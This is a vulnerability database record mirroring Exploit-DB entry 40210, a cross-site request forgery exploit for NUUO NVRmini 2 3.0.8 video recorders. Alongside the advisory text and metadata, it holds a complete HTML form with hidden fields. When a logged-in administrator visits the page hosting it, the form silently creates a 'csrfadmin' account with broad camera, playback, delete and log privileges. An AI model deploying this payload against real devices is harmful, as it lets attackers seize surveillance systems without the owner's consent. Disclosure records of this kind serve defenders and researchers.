ID
VAR-E-201608-0094
EDB ID
40210
TITLE
NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin) - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin).. webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | nuuo | model: | nvrmini | scope: | eq | version: | 23.0.8 | Trust: 1.6 |
| vendor: | nuuo | model: | add admin | scope: | eq | version: | 3.0.8 | Trust: 0.5 |
EXPLOIT
<!--
NUUO CSRF Add Admin Exploit
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php
14.01.2016
-->
<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
<body>
<form action="http://10.0.0.17/users_xml.php">
<input type="hidden" name="_password2" value="admin" />
<input type="hidden" name="addusername" value="csrfadmin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="cmd" value="adduser" />
<input type="hidden" name="group" value="poweruser" />
<input type="hidden" name="displaygroup" value="power user" />
<input type="hidden" name="magic" value="574" />
<input type="hidden" name="liveacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
<input type="hidden" name="pbacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
<input type="hidden" name="ptzacc" value="1" />
<input type="hidden" name="ioacc" value="1" />
<input type="hidden" name="backupacc" value="1" />
<input type="hidden" name="deleteacc" value="1" />
<input type="hidden" name="emapeacc" value="1" />
<input type="hidden" name="remotalkacc" value="1" />
<input type="hidden" name="logacc" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery (Add Admin)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
LiquidWorm
Trust: 0.6
EXTERNAL IDS
| db: | ZSL | id: | ZSL-2016-5349 | Trust: 2.7 |
| db: | EXPLOIT-DB | id: | 40210 | Trust: 1.6 |
| db: | EDBNET | id: | 87238 | Trust: 0.6 |
| db: | EDBNET | id: | 87254 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 138221 | Trust: 0.5 |
REFERENCES
| url: | http://www.zeroscience.mk/en/vulnerabilities/zsl-2016-5349.php | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/40210/ | Trust: 0.6 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 138221 |
| db: | EXPLOIT-DB | id: | 40210 |
| db: | EDBNET | id: | 87238 |
| db: | EDBNET | id: | 87254 |
LAST UPDATE DATE
2022-07-27T09:18:33.248000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 138221 | date: | 2016-08-06T19:04:18 |
| db: | EXPLOIT-DB | id: | 40210 | date: | 2016-08-06T00:00:00 |
| db: | EDBNET | id: | 87238 | date: | 2016-08-07T00:00:00 |
| db: | EDBNET | id: | 87254 | date: | 2016-08-07T00:00:00 |